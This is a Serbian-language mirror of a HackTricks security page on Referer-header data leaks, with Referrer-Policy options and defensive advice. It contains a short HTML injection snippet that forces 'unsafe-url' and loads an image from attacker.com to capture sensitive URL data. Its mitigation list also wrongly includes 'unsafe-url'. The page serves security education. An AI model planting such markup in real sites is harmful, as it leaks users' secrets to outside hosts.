Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00

Translator workflow 6c06826974 Translated to Serbian

2024-02-10 13:11:20 +00:00

3.5 KiB

Raw Blame History

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @hacktricks_live.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Referrer headeri i politika

Referrer je zaglavlje koje koriste pregledači da bi naznačili koja je prethodna posjećena stranica.

Procurene osetljive informacije

Ako se u nekom trenutku unutar web stranice nalaze osetljive informacije u parametrima GET zahteva, ako stranica sadrži linkove ka spoljnim izvorima ili napadač može da napravi/predloži (socijalno inženjerstvo) korisniku da poseti URL koji kontroliše napadač. On bi mogao da izvuče osetljive informacije iz poslednjeg GET zahteva.

Otklanjanje

Možete naterati pregledač da prati Referrer-policy koja bi mogla da spreči slanje osetljivih informacija drugim web aplikacijama:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Protivmere

Možete prebrisati ovu pravilo koristeći HTML meta oznaku (napadač mora iskoristiti HTML ubacivanje):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Odbrana

Nikada ne stavljajte osetljive podatke unutar GET parametara ili putanja u URL-u.